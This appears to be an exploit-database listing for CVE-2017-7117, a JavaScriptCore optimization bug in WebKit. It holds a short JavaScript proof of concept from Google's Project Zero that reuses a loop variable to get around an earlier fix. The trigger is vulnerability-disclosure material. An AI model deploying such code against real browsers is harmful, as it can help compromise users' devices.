WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)
| EKU-ID: 6983 | CVE: 2017-7117 | OSVDB-ID: |
| Author: Google Security Research | Published: 2017-10-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 6983 | CVE: 2017-7117 | OSVDB-ID: |
| Author: Google Security Research | Published: 2017-10-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319
The following PoC bypasses the fix for the issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)
PoC:
-->
function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {
}
print(o[i]);
}
}
f();